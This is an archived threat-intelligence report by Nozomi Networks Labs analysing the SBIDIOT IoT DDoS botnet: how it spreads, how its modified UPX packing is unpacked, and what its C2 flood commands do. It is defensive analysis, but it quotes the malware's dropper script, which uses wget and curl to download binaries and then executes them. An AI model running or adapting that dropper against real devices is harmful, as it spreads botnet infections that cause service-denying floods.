{
	"id": "4206a8b2-6463-4b8e-84dd-bdedb83e6298",
	"created_at": "2026-04-06T00:20:02.006531Z",
	"updated_at": "2026-04-10T13:12:38.815288Z",
	"deleted_at": null,
	"sha1_hash": "33c2354d71334b30e843e59de68c1627e71a0ecb",
	"title": "Threat Intelligence: Analysis of the SBIDIOT IoT Malware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 4961039,
	"plain_text": "Threat Intelligence: Analysis of the SBIDIOT IoT Malware\r\nBy Nozomi Networks Labs | April 7, 2021\r\nArchived: 2026-04-05 16:22:27 UTC\r\nThere are billions of IoT connections in the world and more than 70 percent of them are in the industrial sector. This is why Nozomi Networks Labs regularly reviews the threat landscape for IoT devices. Recently, a malware sample named SBIDIOT caught our attention. It had a relatively low number of detections on VirusTotal and its commands, in their current form, were not well documented by the cybersecurity community.\r\nWe decided to analyze SBIDIOT and uncovered how it communicates with targets and what types of commands it supports. This information helps detect the threat and allows defenders to stop or mitigate it before harmful impacts occur. The main potential impact of DDoS (Distributed Denial of Service) botnets is the generation of excessively high loads on targeted servers, preventing users from accessing services and thus harming normal business operations.\r\nTo avoid impacts, early detection is vital. Detection can be done by your security team (see the malware indicators at the end of this article) or by using a network monitoring and threat intelligence solution such as ours.\r\nAnalysis of SBIDIOT Malware\r\nBased on our information, at least one way that the malware propagates is by exploiting an RCE vulnerability in ZTE routers. For older versions, we observed a shell script that downloads and executes binary payloads once it has been delivered to the victim machines by various means:\r\n#!/bin/bash\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http:///SBIDIOT/x86; curl -O http:///SBIDIOT/x86; cat x86 \u003eSSH; chmod +x *; ./SSH SSH\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http:///SBIDIOT/mips; curl -O http:///SBIDIOT/mips; cat mips \u003eSSH; chmod +x *; ./SSH SSH\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http:///SBIDIOT/mpsl; curl -O http:///SBIDIOT/mpsl; cat mpsl \u003eSSH; chmod +x *; ./SSH SSH\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http:///SBIDIOT/arm; curl -O http:///SBIDIOT/arm; cat arm \u003eSSH; chmod +x *; ./SSH SSH\r\n...\r\nThe sample e2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eabe845af4b9 is packed with the standard UPX tool, with the UPX header later modified. While the malware remains executable, it is no longer possible to unpack it using the same tool straight away:\r\n$ file e2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eabe845af4b9\r\ne2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eabe845af4b9: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, no section header\r\n$ upx -d e2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eabe845af4b9\r\n                       Ultimate Packer for eXecutables\r\n                          Copyright (C) 1996 - 2020\r\nUPX 3.96        Markus Oberhumer, Laszlo Molnar \u0026 John Reiser   Jan 23rd 2020\r\n\r\n        File size         Ratio      Format      Name\r\n   --------------------   ------   -----------   -----------\r\nupx: e2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eabe845af4b9: NotPackedException: not packed by UPX\r\n\r\nUnpacked 0 files.\r\nAs we can see here, the UPX! signature was replaced with a custom YTS\\x99 signature:\r\nhttps://www.nozominetworks.com/blog/threat-intelligence-analysis-of-the-sbidiot-iot-malware/\r\nPage 1 of 9\r\nHex dump showing that the “UPX!” string has been replaced.\r\nRestoring it will enable us to unpack the sample using the standard UPX tool:\r\n$ perl -pi -e 's/YTS\\x99/UPX!/g' e2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eabe845af4b9\r\n$ upx -d e2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eabe845af4b9\r\n                       Ultimate Packer for eXecutables\r\n                          Copyright (C) 1996 - 2020\r\nUPX 3.96        Markus Oberhumer, Laszlo Molnar \u0026 John Reiser   Jan 23rd 2020\r\n\r\n        File size         Ratio      Format      Name\r\n   --------------------   ------   -----------   -----------\r\n     55372 \u003c-     30024   54.22%   linux/i386    e2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eabe845af4b9\r\n\r\nUnpacked 1 file.\r\n$ file e2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eabe845af4b9\r\ne2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eabe845af4b9: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped\r\nThe analysis reveals characteristics quite common for this type of threat. There is a strong focus on DDoS, with some parts of the code shared with other malware families like Gafgyt.\r\nGiven that the sample is statically linked and stripped, which is almost always the case with malware targeting IoT, the next step was to load FLIRT signatures for uClibc to make analysis easier. uClibc is a compact C library commonly used in Linux kernel-based embedded devices, and it is also commonly used by IoT malware developers for easy cross-compilation, as popularized by Mirai. FLIRT signatures are essentially a method that reverse engineering tools like IDA use to pattern-match known libraries, which can greatly speed up the analysis process.\r\nA large number of functions are recognized using FLIRT.\r\nUpon execution, the sample attempts to connect to its C2, which in this case is an IP address and port hard-coded into the binary. Although the C2 infrastructure was not operational at the time of the investigation, we were able to force the sample to talk to our own server as its C2. Coupled with some static analysis, this was enough to quickly figure out the protocol and begin interaction.\r\nThe function responsible for handling commands compares each command received from the C2 with one of the following strings:\r\nTCP\r\nHTTPSTOMP\r\nVSE\r\nHEX\r\nSTD\r\nVOX\r\nNFO\r\nUDP\r\nUDPH\r\nR6\r\nFN\r\nOVHKILL\r\nNFOKILL\r\nSTOP\r\nStop\r\nstop\r\nThen, based on the result, it performs several validation checks on the arguments before executing the actual command.\r\nCommands Supported by SBIDIOT\r\nTCP\r\nThe TCP command asks the bot to send TCP segments destined for a specified host/port combination for a specified interval of time. Additionally, it allows the operator to set a number of optional TCP flags.\r\nCustom TCP flags supported in the TCP command handler.\r\nHTTPSTOMP\r\nAs arguments, it takes an HTTP method, a host/port combination, an attack duration and a request count specifying how many times to repeat the operation. While neither the attack duration nor the request count has been exceeded, this function continues to perform HTTP requests using the settings provided and a randomly selected user-agent string.\r\nHard-coded list of user-agent strings.\r\nHTTPSTOMP command handler.\r\nAdditionally, another function is called to perform HTTP requests to the /cdn-cgi/l/chk_captcha URI of a hostname/port combination with, once again, a configurable attack duration and request count. This is done in an attempt to circumvent Cloudflare protection mechanisms.\r\nVSE\r\nAnother command used for DDoS, which, depending on the arguments provided, employs either UDP or raw sockets. Again, arguments for the target and attack duration can be provided, but additionally the attacker can specify a pause interval between packets delivered to the target. Variants of Gafgyt and other IoT malware occasionally include a VSE command to target servers running the Valve Source Engine.\r\nCode snippet from VSE command handler implementing pause interval.\r\nVOX\r\nThe VOX command takes a host, a port and an attack duration as its arguments and then sends UDP datagrams with one of three randomly selected hard-coded payloads.\r\nRecorded malicious UDP traffic containing hard-coded payloads.\r\nUDP\r\nThe sample sends UDP payloads to a target host, with the operator specifying the port, the attack duration and the maximum size of the generated payload. The actual size of the payload may be smaller due to the use of the strlen function, which calculates the size by counting bytes up until the first null byte.\r\nCommand handler validating UDP arguments.\r\nHEX / STD / R6 / NFO / FN / OVHKILL / NFOKILL / UDPH\r\nAll of the above commands call the same function, which receives a host name, a port and an attack duration, then starts generating UDP traffic with a fixed payload.\r\nCode diagram with several code blocks pointing to the same function.\r\nSTOP/stop/Stop\r\nThis command sends a SIGKILL signal to all process IDs that are currently being tracked, giving the operator the ability to stop any of the process's children.\r\nSTOP command handler.\r\nThreat Intelligence is Needed to Defend Industrial Systems from IoT Malware\r\nAs the number of Internet-connected devices increases at a rate of more than 130 percent a year,[1] the threat landscape also rapidly evolves. New families of malware and modifications of existing ones emerge regularly. And, regardless of their complexity and sophistication, they all pose a threat.\r\nTo defend against threats to IoT devices that could impact production, uptime and possibly safety, automated tools can help. OT/IoT network monitoring paired with regularly updated threat intelligence identifies indicators of compromise and anomalous behavior, giving you the opportunity to act before harm occurs.\r\nNozomi Networks Labs is committed to providing real-time information on IoT threats as they continue to increase in prevalence and significance for operational technology environments. Stay tuned for ongoing updates.\r\nFor indicators of SBIDIOT malware, see the information provided at the end of this page.\r\nReferences\r\n1. “The Internet of Things: Consumer, Industrial \u0026 Public Services 2020-2024,” Juniper Networks, March 31, 2020.\r\nSource: https://www.nozominetworks.com/blog/threat-intelligence-analysis-of-the-sbidiot-iot-malware/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.nozominetworks.com/blog/threat-intelligence-analysis-of-the-sbidiot-iot-malware/"
	],
	"report_names": [
		"threat-intelligence-analysis-of-the-sbidiot-iot-malware"
	],
	"threat_actors": [],
	"ts_created_at": 1775434802,
	"ts_updated_at": 1775826758,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/33c2354d71334b30e843e59de68c1627e71a0ecb.pdf",
		"text": "https://archive.orkl.eu/33c2354d71334b30e843e59de68c1627e71a0ecb.txt",
		"img": "https://archive.orkl.eu/33c2354d71334b30e843e59de68c1627e71a0ecb.jpg"
	}
}